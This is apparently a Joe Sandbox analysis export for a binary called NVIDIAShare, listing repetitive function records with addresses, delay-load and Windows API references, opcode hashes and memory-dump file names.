Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction ID: f24ffd3c0d9de15338cb36a0ee711db0cb88598c4778754a3443df5f911b958a
Opcode Fuzzy Hash: d930e5b9385fd8ca8887850c0ba9ca44294a8aa34f83e07c2a4ec37f781d3a9a
Instruction Fuzzy Hash: F6D012B01402459BE763EBACE445F5C77E9B368B60F800545FEC9D645CEB7D8180D705

Function 010098BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,010097BE), ref: 010098C8

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction ID: 1fb0e3154a6043a8d13b8d0db464858d1214f0d85553763f3737c6482a8f597e
Opcode Fuzzy Hash: 0e67af4597f19861898c331419ecf5b81a5b553dc04a50b0f47363dbc3069fb5
Instruction Fuzzy Hash: AAC01274400105C59E73462894440957751AA42279BB486D4D0AC891D3C333C547EB10

Function 0101E1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
Instruction ID: 5ff96de9461d4158f60c1b91e5365f93a8f1105dc464786ec99da415e3066450
Opcode Fuzzy Hash: 6b27047d551c094225fa10cc201edd48a872d2288f3244810cdc5bb864228367
Instruction Fuzzy Hash: 85B012E5258101FC30051196DD06CBF111CF6C2A10320842FFCCADC484D8449C410471

Function 0101E1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
Instruction ID: ca840653b39987abb5a73845b38773fea99e3f6d3893212e7b8b6933f2efc414
Opcode Fuzzy Hash: fab5e3af31f04a0a31b1398938baa0f89f71afdb44e88839223d9ecf3cbb8e7a
Instruction Fuzzy Hash: 24B012E525C101EC3005519ADD06CBF111CF6C1910320402FFCCECC084D8445C410571

Function 0101E1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
Instruction ID: 0bf389340c27f92d10abb063e0b80ad5b6fff3411c75cd12cbb4e7e8c97b338e
Opcode Fuzzy Hash: bff7b3a8d121b01c051bb420b9bf95d8aba96cf310e8717b5230441f12f3c440
Instruction Fuzzy Hash: 70B012E1258001EC30055656DD05CBF111CF6C1A20320C02FFCCECC184D8449C450471

Function 0101E200 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
Instruction ID: 16b6728ec751a05294144d33f3e699467f803e35b0dea1ccac81917338dd6c99
Opcode Fuzzy Hash: 4bf480fb42819d87d6ea78b6d3be9e05231d8e84a45f5f434e8a7a9d0d54e2cc
Instruction Fuzzy Hash: 9EB012E1368141FD30455256DD05CBF111CF6C0920320812FFCCECC184D8445C850471

Function 0101E20A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
Instruction ID: cd70605c8cdcf644768da5b1626b17a05adff152b0e3ca669021a47e8f7d4e34
Opcode Fuzzy Hash: 5ad2404d985bae6c0c62a8073c4742a55d3166dffb5b074b7445e39b6b4ef89c
Instruction Fuzzy Hash: 38B012E1258001EC30055256DE05CBF111CF6C0920320802FFCCECC184DC445D4A0471

Function 0101E21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
Instruction ID: 10525fe6a56efb750e824890774332c6b5c10526b59e977fc2a31927558e2381
Opcode Fuzzy Hash: 2ae7688a7df7a270238c71aed01d3d17fd48da2f69d9ae0f23d950418f1dec7d
Instruction Fuzzy Hash: 8AB012F1258001FC30055156DD05CBF115CF6C1F10320802FFCCECC084D8449D450471

Function 0101E228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
Instruction ID: 9782547166103dc46d1bf7ea15c09e8f14cc583ac68d401e17357ed581be974d
Opcode Fuzzy Hash: 0825d0a704fd763b3dc4f04e5af1b422bf677ec2c569960e0afc5a6d213a30a0
Instruction Fuzzy Hash: 4FB012F1258101FD30455156DD05CBF115CF6C0E10320412FFCCECC084D8445D8104B1

Function 0101E232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
Instruction ID: 7355c22bbead29b5bc7e7ce2fceab7e32abb78ff286265dfe9fce92d2ab4fa88
Opcode Fuzzy Hash: 8d575f865741a4df0baeb54127af3c04b4c9fb85e371331ec3e64ed30c471e7e
Instruction Fuzzy Hash: 89B012F1258001EC30055556DE05CBF115CF6C0E10320402FFCCECC084DC445E420471

Function 0101E23C Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
Instruction ID: 5cbcc7a153bbe98248640cd6314caa06239b6ad8fb61148a845c1e3f408d876b
Opcode Fuzzy Hash: 36ffa3ef381845597bff9e9cf7ad8e66aa9dd98071fab1933a1aa2619ef56f98
Instruction Fuzzy Hash: 28B012F1258001EC30055157DD05CBF115CF6D0E10320402FFCCECC084D8445D410471

Function 0101E246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
Instruction ID: b2c40ba8b135e5448102529fdf150c7e7cbd843928fca5f99796b982c1c566cf
Opcode Fuzzy Hash: 7e56146bb6faf583ef3a7f66dc07e24a3c726d7ab3b9c1f2a9557c37eae3da28
Instruction Fuzzy Hash: 89B012E1259041EC30055156DD05CBF111DF7C1A10320802FFCCECC084D8449C410471

Function 0101E250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
Instruction ID: 83637c04ff00bce7e9de6fc22033e93fd6ad7be8891bbc49264a001c40495572
Opcode Fuzzy Hash: 61786e111ea5a4bfa2e694ba476e684aaeda231b3351de3de1067acd08a26021
Instruction Fuzzy Hash: 75B012F1259141FD30455256DD05CBF111DF7C0910320412FFCCECC084D8445C850471

Function 0101E264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
Instruction ID: e0aeba5ee79d3d2f03f4d34176bdcea84196a858ca29dcb6d883c46ef0b75eff
Opcode Fuzzy Hash: 61a58f0c34e376a829010ba3c9ca1aa0f92c52d297055c9529ce88e773049cfc
Instruction Fuzzy Hash: 2CB012E1269041EC30055156DD05CBF115DFBC0910320402FFCCFCC084D8445C410471

Function 0101E26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
Instruction ID: bd6ff8c7039774ba3754c8e646c49a5dd1b1b0c8236d03d57bf20b011aae1a85
Opcode Fuzzy Hash: dd9d81f14d043ba74f8aae6b16c608f23e1dd455fedda3cf00b38ee2b8a10492
Instruction Fuzzy Hash: C2B012E1258001EC30055166DD05CBF115CF6C1A10320802FFCCECC084D844DD810471

Function 0101E282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E1E3

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
Instruction ID: fd1418eb35aaa4a8b0adb9ea5527ebfd145f80f6751442d17db9b6e78c47552c
Opcode Fuzzy Hash: 7b8a396523309b72332c461f060e6cff52a9fa719689d5781bd86f313d15e5e9
Instruction Fuzzy Hash: 45B012F1258001EC30055156DE05CBF119CF6C0910320402FFCCECC084DC445E820471

Function 0101E50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0101E51F

Part of subcall function 0101E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0101E8D0
Part of subcall function 0101E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0101E8E1

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
